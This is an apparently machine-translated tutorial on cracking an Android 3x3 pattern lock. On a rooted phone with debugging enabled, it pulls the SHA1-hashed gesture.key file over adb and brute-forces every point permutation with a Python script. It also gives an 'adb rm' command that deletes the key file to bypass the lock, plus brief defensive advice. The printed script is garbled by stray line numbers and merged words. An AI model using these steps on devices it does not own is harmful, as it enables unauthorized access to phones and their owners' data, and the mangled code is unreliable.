Hack Android Phone Graphics lock

The Android phone's graphics lock includes a 3*3,4*4,5*5 dot matrix that connects several dots sequentially to lock/unlock. Take 3*3 as an example, you need to connect at least 4 points and connect up to 9 points at a minimum. In the process of drawing the graph, each of the 9 points is selected, which in fact represents a single digit selected. When we connect 4 points, the resulting graph also indirectly generates a set of passwords. For example, we select the 02, 04, 05, 08 of the four points, then the composition of the password is 02040508. Of course, for security, the generated password is not directly stored, so the Android system converts 02040508 to 16 and is encrypted with SHA1 and stored in the/data/system/gesture.key file on the phone. All we have to do is crack the key stored in this file, and the key can be used to get the point of drawing the graph, and then enter the mobile phone system.

There are two prerequisites for a hack:

(1) The phone needs root;

(2) need to turn on debug mode.

Meet the above two conditions, we can begin to hack the Android phone's graphics password.

First use the ADB to enter the shell mode of the phone. Then adb pull Data/system/gesture.key gesture.key. Copy the files stored in the key to your computer. Open the Gesture.key file with C32asm and discover that its file contents are SHA1 encrypted. 1 is shown below:

Figure 1

Because the key is a point-based password, the password that is decrypted for the SHA1 key should be greater than 4 bits less than 9 bits. The number of passwords is probably between 3024~985824. Now that the number of passwords is known, we can do a brute-down hack of the password.

Use Python to write a brute-cracking program:

The main programming ideas are as follows: first of all, 00-09 of these numbers are arranged together, it is necessary to use the Itertools module in Python to complete the iterative loop operation. The combined sequence of numbers is used to encrypt the string using the Hashlib module and then collide with the key in the Gesture.key file, knowing that the same set of numbers is found.

Code:

1 #Coding:utf-82 ImportItertools3 ImportHashlib4 Import Time5 ImportOS6 #call cmd,adb to connect to the phone and read the SHA1 encrypted string7 #Os.system (r "adb pull/data/system/gesture.key Gesture.key")8Time.sleep (5)9F=open ('Gesture.key','R')TenPswd=F.readline () One f.close () APswd_hex=pswd.encode ('Hex') - PrintU'the password After encryption is:%s'%Pswd_hex - #generate unlock sequence, get [' xx ', ' ', ' ', ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ' thematrix=[]  -  forIinchRange (0,9): -Str_temp ='0'+Str (i) - matrix.append (str_temp) + #Arranges 00--08 characters in at least 4 numbers, up to all permutations -Min_num=4 +max_num=len (Matrix) Alist_m=[] at  forNuminchRange (min_num,max_num+1):#from Geneva -Iter1 = Itertools.permutations (matrix,num)#Select N from 9 numbers to arrange -List_m.append (List (iter1))#all the resulting permutations are stored in the List_m list -  -  forIinchlist_m: -      forElinchI#Traverse all the permutations of these n numbers instrlist="'. Join (EL)#converts the list to Str. [00,03,06,07,08]-->0003060708 -         #Print Strlist toSTRLIST_SHA1 = HASHLIB.SHA1 (Strlist.decode ('Hex'). Hexdigest ()#SHA1 encryption of strings +         ifPSWD_HEX==STRLIST_SHA1:#compare a string in a phone file with an encrypted string -             PrintU'The unlock password is:', strlist

when the script is finished, the password for the graphics sequence is printed, and the corresponding graphics are drawn in 0001020406 order to enter the phone.

In this way to get the restrictions on mobile phone permissions or more, first of all, the phone must be the root of the highest permissions, and the developer debugging mode is turned on.

The defense against the above attack method is to shut down the developer debug mode, the phone is stolen can prohibit other people on the phone adb debugging password. Also to prevent the Trojan is implanted mobile phone, because through the Trojan can also export the Gesture.key Key management file in the phone.

In addition, for the purpose of cracking, if you simply forget your phone graphics lock password, can be used in a simpler way : ADB connect the phone, and then "ADB rm/data/system/gesture.key" Delete the Gesture.key file, at this time the graphics lock is invalid, at will be able to draw a bit can unlock.

Reference article: http://www.jb51.net/softjc/295236.html

Hack Android Phone Graphics lock